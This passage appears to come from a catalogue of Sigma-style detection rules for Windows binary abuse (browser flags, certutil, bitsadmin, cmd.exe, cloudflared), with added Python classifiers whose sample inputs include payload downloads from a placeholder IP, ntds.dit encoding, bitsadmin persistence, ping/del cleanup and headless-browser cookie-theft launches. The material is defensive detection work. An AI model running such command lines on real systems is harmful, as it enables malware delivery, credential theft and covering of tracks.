https://twitter.com/mrd0x/status/1478234484881436672?s=12, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html |
Chromium Browser Instance Executed With Custom Extension |
Detects a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension |
https://redcanary.com/blog/chromeloader/, https://emkc.org/s/RJjuLa, https://www.mandiant.com/resources/blog/lnk-between-browsers |
Chromium Browser Headless Execution To Mockbin Like Site |
Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). |
https://www.zscaler.com/blogs/security-research/steal-it-campaign |
Suspicious Chromium Browser Instance Executed With Custom Extension |
Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension |
https://redcanary.com/blog/chromeloader/, https://emkc.org/s/RJjuLa, https://www.mandiant.com/resources/blog/lnk-between-browsers |
File Download From Browser Process Via Inline URL |
Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. |
https://twitter.com/mrd0x/status/1478116126005641220, https://lolbas-project.github.io/lolbas/Binaries/Msedge/ |
Browser Started with Remote Debugging |
Detects browsers starting with the remote debugging flags, a technique often used to perform browser injection attacks and to steal session data such as cookies |
https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf, https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/, https://github.com/defaultnamehere/cookie_crimes/, https://github.com/wunderwuzzi23/firefox-cookiemonster |
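The rules above all key on a handful of Chromium command-line switches ("--headless", "--dump-dom", "--remote-debugging-port"/"--remote-debugging-pipe", "--user-data-dir", "--load-extension" and an inline URL). The following is an added example, not code from the rule set or the Sigma project, that parses those switches out of constructed process-creation command lines and reports which of the patterns each one matches. The list of Chromium-based process names and the set of "interesting" URL extensions are assumptions and not taken from the rules.

```python
"""Flag Chromium command lines for the headless / remote-debugging / extension patterns above."""
import re

# Assumptions (illustrative, not from the rules): which process names count as Chromium
# based and which URL extensions are worth flagging when passed inline to a browser.
CHROMIUM_BROWSERS = {"chrome", "msedge", "brave", "opera", "vivaldi", "chromium"}
DOWNLOAD_EXT = (".exe", ".dll", ".zip", ".7z", ".ps1", ".vbs", ".js", ".hta", ".msi")
FLAG_RE = re.compile(r'--([A-Za-z0-9-]+)(?:=("[^"]*"|\S+))?')
URL_RE = re.compile(r'https?://[^\s"]+', re.I)

# Constructed sample command lines (Sysmon Event ID 1 style); none are real captures.
SAMPLE_COMMAND_LINES = [
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9222 --user-data-dir="C:\Users\bob\AppData\Local\Google\Chrome\User Data"',
    r"chrome.exe --headless --dump-dom https://example.com/x.zip",
    r'msedge.exe --load-extension="C:\Users\bob\AppData\Local\Temp\ext"',
    r"chrome.exe --headless=new https://mockbin.org/bin/1f2e3d?data=aGVsbG8",
    r"chrome.exe https://example.com",
    r"chrome.exe --remote-debugging-pipe",
    r"notepad.exe --headless",
]


def browser_name(cmdline):
    """First token (quoted or not) reduced to the executable name without .exe."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    exe = (m.group(1) or m.group(2)) if m else ""
    return re.sub(r"\.exe$", "", exe.rsplit("\\", 1)[-1].lower())


def classify_browser(cmdline):
    """Return rule-like findings for a Chromium command line; [] for other binaries."""
    if browser_name(cmdline) not in CHROMIUM_BROWSERS:
        return []
    # --flag or --flag=value; values may be double-quoted and contain spaces
    flags = {m.group(1).lower(): (m.group(2) or "").strip('"') for m in FLAG_RE.finditer(cmdline)}
    urls = URL_RE.findall(cmdline)
    findings = []
    if "headless" in flags:  # also covers --headless=new / --headless=old
        findings.append("headless")
        if "dump-dom" in flags:
            findings.append("headless_dump_dom")
    if "remote-debugging-port" in flags or "remote-debugging-pipe" in flags:
        findings.append("remote_debugging")
        # headless + debugging port + an existing profile is the cookie-theft shape
        if "headless" in flags and "user-data-dir" in flags:
            findings.append("headless_debugging_with_profile")
    if "load-extension" in flags:
        findings.append("custom_extension")
    if "headless" in flags and any("mockbin.org" in u.lower() for u in urls):
        findings.append("headless_mockbin_exfil")
    # inline URL whose path (query string removed) ends in a downloadable extension
    if any(u.split("?", 1)[0].lower().endswith(DOWNLOAD_EXT) for u in urls):
        findings.append("inline_file_download")
    return findings


if __name__ == "__main__":
    for cl in SAMPLE_COMMAND_LINES:
        print(f"{', '.join(classify_browser(cl)) or '-':50} {cl[:70]}")
```

Note that "--headless" alone is noisy in environments that run browser-based test suites or PDF rendering; the combination with "--remote-debugging-port" and "--user-data-dir" is the one worth paging on.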
Tor Client/Browser Execution |
Detects the use of Tor or Tor-Browser to connect to onion routing networks |
https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ |
Suspicious Calculator Usage |
Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
|
https://twitter.com/ItsReallyNick/status/1094080242686312448 |
Potential Binary Proxy Execution Via Cdb.EXE |
Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/, https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html, https://twitter.com/nas_bench/status/1534957360032120833 |
New Root Certificate Installed Via CertMgr.EXE |
Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md, https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/ |
File Download via CertOC.EXE |
Detects when a user downloads a file by using CertOC.exe |
https://lolbas-project.github.io/lolbas/Binaries/Certoc/ |
File Download From IP Based URL Via CertOC.EXE |
Detects when a user downloads a file from an IP based URL using CertOC.exe |
https://lolbas-project.github.io/lolbas/Binaries/Certoc/ |
DLL Loaded via CertOC.EXE |
Detects when a user installs certificates by using CertOC.exe to load the target DLL file. |
https://twitter.com/sblmsrsn/status/1445758411803480072?s=20, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2, https://lolbas-project.github.io/lolbas/Binaries/Certoc/ |
Suspicious DLL Loaded via CertOC.EXE |
Detects when a user installs certificates by using CertOC.exe to load the target DLL file. |
https://twitter.com/sblmsrsn/status/1445758411803480072?s=20, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2, https://lolbas-project.github.io/lolbas/Binaries/Certoc/ |
New Root Certificate Installed Via Certutil.EXE |
Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md |
File Decoded From Base64/Hex Via Certutil.EXE |
Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/JohnLaTwC/status/835149808817991680, https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil, https://lolbas-project.github.io/lolbas/Binaries/Certutil/ |
Suspicious Download Via Certutil.EXE |
Detects the execution of certutil with certain flags that allow the utility to download files. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/ |
Suspicious File Downloaded From Direct IP Via Certutil.EXE |
Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/, https://twitter.com/_JohnHammond/status/1708910264261980634 |
Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE |
Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://forensicitguy.github.io/agenttesla-vba-certutil-download/, https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
File Encoded To Base64 Via Certutil.EXE |
Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil, https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/, https://lolbas-project.github.io/lolbas/Binaries/Certutil/ |
Potential NTLM Coercion Via Certutil.EXE |
Detects possible NTLM coercion via certutil using the 'syncwithWU' flag |
https://github.com/LOLBAS-Project/LOLBAS/issues/243 |
Suspicious File Encoded To Base64 Via Certutil.EXE |
Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extension of the file is suspicious |
https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior, https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior, https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior, https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior |
File In Suspicious Location Encoded To Base64 Via Certutil.EXE |
Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations |
https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior, https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior, https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior, https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior |
Certificate Exported Via Certutil.EXE |
Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. |
https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html |
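The bitsadmin rules above and the certutil rules in this block both reduce to the same two questions about a process-creation event: which switches were passed, and do the URL and file-path arguments point somewhere suspicious. The following is an added example, not code from the rule set or the Sigma project, that tokenizes constructed command lines for both binaries and returns the rule-like findings for each one. The watch-lists (file-sharing domains, suspicious directories and extensions, "sensitive" encode sources) are illustrative assumptions; the switches themselves (-urlcache, -verifyctl, -decode, -decodehex, -encode, -addstore, -exportPFX, -syncwithWU, /transfer, /addfile, /SetNotifyCmdLine) are the documented ones.

```python
"""Classify certutil.exe and bitsadmin.exe command lines along the lines of the rules above."""
import re
import shlex

# Illustrative watch-lists (assumptions, not taken from the rules): extend from the
# rule sources before relying on them.
FILE_SHARING_DOMAINS = ("transfer.sh", "anonfiles.com", "pastebin.com", "mega.nz")
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\windows\\temp\\", "\\programdata\\", "\\appdata\\local\\temp\\")
SUSPICIOUS_EXT = (".exe", ".dll", ".ps1", ".vbs", ".bat", ".scr")
SENSITIVE_ENCODE_EXT = (".dit", ".sam", ".dmp", ".kirbi")
URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)
IP_URL_RE = re.compile(r"^(?:https?|ftp)://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)", re.I)

# Constructed sample command lines (as Sysmon Event ID 1 / 4688 would report them).
SAMPLE_COMMAND_LINES = [
    r"certutil.exe -urlcache -split -f http://203.0.113.5/p.txt C:\Users\Public\p.txt",
    r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe",
    r"certutil -encode C:\Windows\Temp\ntds.dit C:\Windows\Temp\n.b64",
    r"certutil -addstore -f Root C:\Temp\ca.cer",
    r"certutil -verifyctl -f -split https://transfer.sh/abc/x.dll",
    r"C:\Windows\System32\bitsadmin.exe /transfer job1 /download /priority high http://203.0.113.5/x.exe C:\Users\Public\x.exe",
    r"bitsadmin /SetNotifyCmdLine job1 C:\Users\Public\x.exe NULL",
    r"certutil -hashfile C:\setup.msi SHA256",
]


def split_cmdline(cmdline):
    """Windows-style split: keeps backslashes, honours double quotes, tolerates bad quoting."""
    try:
        toks = shlex.split(cmdline, posix=False)
    except ValueError:
        toks = cmdline.split()
    return [t.strip('"') for t in toks]


def _binary(tok):
    return re.sub(r"\.exe$", "", tok.rsplit("\\", 1)[-1].lower())


def _url_findings(urls, prefix):
    out = []
    if urls:
        out.append(f"{prefix}_download")
        if any(IP_URL_RE.match(u) for u in urls):
            out.append(f"{prefix}_download_direct_ip")
        if any(d in u.lower() for u in urls for d in FILE_SHARING_DOMAINS):
            out.append(f"{prefix}_download_file_sharing")
    return out


def _path_findings(paths, prefix):
    out = []
    if any(d in p.lower() for p in paths for d in SUSPICIOUS_DIRS):
        out.append(f"{prefix}_suspicious_target_dir")
    if any(p.lower().endswith(SUSPICIOUS_EXT) for p in paths):
        out.append(f"{prefix}_suspicious_extension")
    return out


def classify(cmdline):
    """Return the list of rule-like findings for one command line ([] if benign or another binary)."""
    toks = split_cmdline(cmdline)
    if not toks:
        return []
    binary = _binary(toks[0])
    # certutil accepts both -flag and /flag; bitsadmin uses /flag
    flags = {t[1:].lower() for t in toks[1:] if len(t) > 1 and t[0] in "-/"}
    args = [t for t in toks[1:] if not (len(t) > 1 and t[0] in "-/")]
    urls = [a for a in args if URL_RE.match(a)]
    paths = [a for a in args if not URL_RE.match(a)]
    findings = []
    if binary == "certutil":
        if flags & {"urlcache", "verifyctl"}:
            findings += _url_findings(urls, "certutil")
        if flags & {"decode", "decodehex"}:
            findings.append("certutil_decode")
        if "encode" in flags:
            findings.append("certutil_encode")
            if any(p.lower().endswith(SENSITIVE_ENCODE_EXT) for p in paths):
                findings.append("certutil_encode_sensitive_file")
        if "addstore" in flags and any(a.lower() == "root" for a in args):
            findings.append("certutil_root_cert_install")
        if "exportpfx" in flags:
            findings.append("certutil_cert_export")
        if "syncwithwu" in flags:
            findings.append("certutil_syncwithwu")
    elif binary == "bitsadmin":
        if flags & {"transfer", "addfile"}:
            findings += _url_findings(urls, "bitsadmin")
            findings += _path_findings(paths, "bitsadmin")
        if "setnotifycmdline" in flags:
            findings.append("bitsadmin_notify_cmdline_persistence")
    return findings


def scan(cmdlines):
    """Map each command line that triggers at least one finding to its findings."""
    return {cl: f for cl in cmdlines if (f := classify(cl))}


if __name__ == "__main__":
    for cl, f in scan(SAMPLE_COMMAND_LINES).items():
        print(f"{', '.join(f):60} {cl[:60]}")
```

Two practical caveats: certutil -urlcache also has legitimate CRL/AIA fetching uses on servers, so the IP-URL and file-sharing variants are the ones with useful precision, and both binaries can be renamed or copied elsewhere, so matching on the OriginalFileName field of the event is more robust than matching on the image path alone.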
Suspicious CodePage Switch Via CHCP |
Detects a code page switch in command line or batch scripts to a rare language |
https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://twitter.com/cglyer/status/1183756892952248325 |
Console CodePage Lookup Via CHCP |
Detects use of chcp to look up the system locale value as part of host discovery |
https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp |
Deleted Data Overwritten Via Cipher.EXE |
Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive |
Process Access via TrolleyExpress Exclusion |
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory |
https://twitter.com/_xpn_/status/1491557187168178176, https://www.youtube.com/watch?v=Ie831jF0bb0 |
Data Copied To Clipboard Via Clip.EXE |
Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md |
Cloudflared Portable Execution |
Detects the execution of the "cloudflared" binary from a non standard location.
|
https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, https://github.com/cloudflare/cloudflared/releases |
Cloudflared Quick Tunnel Execution |
Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.
The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.
The tool has been observed in use by threat groups including Akira ransomware.
|
https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/ |
Cloudflared Tunnel Connections Cleanup |
Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. |
https://github.com/cloudflare/cloudflared, https://developers.cloudflare.com/cloudflare-one/connections/connect-apps |
Cloudflared Tunnel Execution |
Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. |
https://blog.reconinfosec.com/emergence-of-akira-ransomware-group, https://github.com/cloudflare/cloudflared, https://developers.cloudflare.com/cloudflare-one/connections/connect-apps |
New Generic Credentials Added Via Cmdkey.EXE |
Detects usage of "cmdkey.exe" to add generic credentials.
As an example, this can be used before connecting to an RDP session via command line interface.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol |
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE |
Detects usage of cmdkey to look for cached credentials on the system |
https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation, https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx, https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey |
Change Default File Association Via Assoc |
Detects file association changes using the builtin "assoc" command.
When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md |
Potential Arbitrary File Download Via Cmdl32.EXE |
Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
Attackers can abuse this utility in order to download arbitrary files via a configuration file.
Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
|
https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/, https://twitter.com/SwiftOnSecurity/status/1455897435063074824, https://github.com/LOLBAS-Project/LOLBAS/pull/151 |
Change Default File Association To Executable Via Assoc |
Detects when a program changes the default file association of any extension to an executable.
When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/assoc |
Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE |
Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share |
https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Curl Download And Execute Combination |
Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. |
https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 |
File Deletion Via Del |
Detects execution of the builtin "del"/"erase" commands in order to delete files.
Adversaries may delete files left behind by the actions of their intrusion activity.
Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase |
Greedy File Deletion Using Del |
Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. |
https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase |
File And SubFolder Enumeration Via Dir Command |
Detects usage of the "dir" command, part of Windows CMD, with the "/S" command line flag in order to enumerate files in a specified directory and all of its subdirectories.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md |
Potential Dosfuscation Activity |
Detects possible payload obfuscation via the commandline |
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf, https://github.com/danielbohannon/Invoke-DOSfuscation |
Command Line Execution with Suspicious URL and AppData Strings |
Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) |
https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100, https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100 |
Potential Privilege Escalation Using Symlink Between Osk and Cmd |
Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. |
https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md, https://ss64.com/nt/mklink.html |
VolumeShadowCopy Symlink Creation Via Mklink |
Detects the creation of a symbolic link to Volume Shadow Copy storage using built-in operating system utilities such as mklink, a step commonly seen before in-use files (registry hives, NTDS.dit) are copied out of the snapshot for credential dumping |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Suspicious File Execution From Internet Hosted WebDav Share |
Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files |
https://twitter.com/ShadowChasing1/status/1552595370961944576, https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior |
Cmd.EXE Missing Space Characters Execution Anomaly |
Detects Windows command lines that are missing a space before or after the /c flag when running a command via cmd.exe.
This could be a sign of obfuscation or of a fat finger problem (a typo by the developer).
|
https://twitter.com/cyb3rops/status/1562072617552678912, https://ss64.com/nt/cmd.html |
Potential CommandLine Path Traversal Via Cmd.EXE |
Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking |
https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/, https://twitter.com/Oddvarmoe/status/1270633613449723905 |
NtdllPipe Like Activity Execution |
Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe |
https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe |
Potentially Suspicious Ping/Copy Command Combination |
Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
|
Internal Research |
Suspicious Ping/Del Command Combination |
Detects a method often used by ransomware that combines "ping" (to wait a couple of seconds) with "del" to delete the file in question. It is used, for example, to remove the file responsible for the initial infection |
https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf, https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware |
Potentially Suspicious CMD Shell Output Redirect |
Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
|
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
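The cmd.exe rules above (missing space around /c, "/../../" path traversal, ping/del and ping/copy one-liners, output redirected to a staging folder) are all expressible as regular expressions over the command line. The following is an added example, not code from the rule set or the Sigma project, that runs those checks over constructed command lines; the set of suspicious redirect directories is an illustrative assumption and shorter than the rule's own list.

```python
"""Regex checks for the cmd.exe command-line anomalies described above."""
import re

# Assumed suspicious redirect targets (illustrative; the rule's own list is longer).
SUSPICIOUS_REDIRECT_DIRS = ("\\users\\public\\", "\\windows\\temp\\", "\\appdata\\local\\temp\\",
                            "\\programdata\\", "c:\\temp\\")

# "cmd.exe/c ..." or "cmd/c ..." (no space before), or '/c"...' (no space after)
MISSING_SPACE_RE = re.compile(r'\bcmd(?:\.exe)?"?/[ck]\b|/[ck](?=["\'])', re.I)
PATH_TRAVERSAL_RE = re.compile(r"/\.\./\.\./")
# ping used as a sleep: "ping ... -n <count>" or "/n <count>", within one command segment
PING_WAIT_RE = re.compile(r"\bping(?:\.exe)?\b[^&|]*\s[-/]n\s+\d+", re.I)
DEL_RE = re.compile(r"(?:^|[\s&|(])(?:del|erase)\s", re.I)
COPY_RE = re.compile(r"(?:^|[\s&|(])copy\s", re.I)
# ">" or ">>" followed by an absolute Windows path (optionally quoted)
REDIRECT_RE = re.compile(r'>>?\s*"?([A-Za-z]:\\[^"&|]+)')

# Constructed sample command lines; none are real captures.
SAMPLE_COMMAND_LINES = [
    r"cmd.exe/c whoami",
    r'cmd.exe /c"whoami"',
    r'cmd.exe /c "dir /../../windows/system32/calc.exe"',
    r'cmd.exe /c ping 127.0.0.1 -n 5 > nul & del /f /q "C:\Users\bob\AppData\Local\Temp\stage.exe"',
    r"cmd /c ping -n 3 127.0.0.1 & copy C:\Users\Public\a.exe C:\ProgramData\b.exe",
    r"cmd.exe /c hostname > C:\Users\Public\h.txt",
    r"cmd.exe /c dir /s C:\Users\bob > C:\Users\bob\Documents\listing.txt",
    r"cmd.exe /k echo hi",
]


def check_cmdline(cmdline):
    """Return the rule-like findings for one cmd.exe command line ([] if nothing matched)."""
    findings = []
    if MISSING_SPACE_RE.search(cmdline):
        findings.append("missing_space_around_switch")
    if PATH_TRAVERSAL_RE.search(cmdline):
        findings.append("path_traversal")
    if PING_WAIT_RE.search(cmdline):
        if DEL_RE.search(cmdline):
            findings.append("ping_del_combination")
        if COPY_RE.search(cmdline):
            findings.append("ping_copy_combination")
    for target in REDIRECT_RE.findall(cmdline):
        if any(d in target.lower() for d in SUSPICIOUS_REDIRECT_DIRS):
            findings.append("output_redirect_suspicious_dir")
            break
    return findings


def scan(cmdlines):
    """Map each command line with at least one finding to its findings."""
    return {cl: f for cl in cmdlines if (f := check_cmdline(cl))}


if __name__ == "__main__":
    for cl, f in scan(SAMPLE_COMMAND_LINES).items():
        print(f"{', '.join(f):35} {cl}")
```

The redirect check deliberately requires a drive-letter path so that "> nul" and redirects into the current directory are ignored; a "hostname > h.txt" run from a user's Public folder would be missed, which is the trade-off the original rule also makes by matching on path fragments.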
Directory Removal Via Rmdir |
Detects execution of the builtin "rmdir" command in order to delete directories.
Adversaries may delete files left behind by the actions of their intrusion activity.
Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase |
Copy From VolumeShadowCopy Via Cmd.EXE |
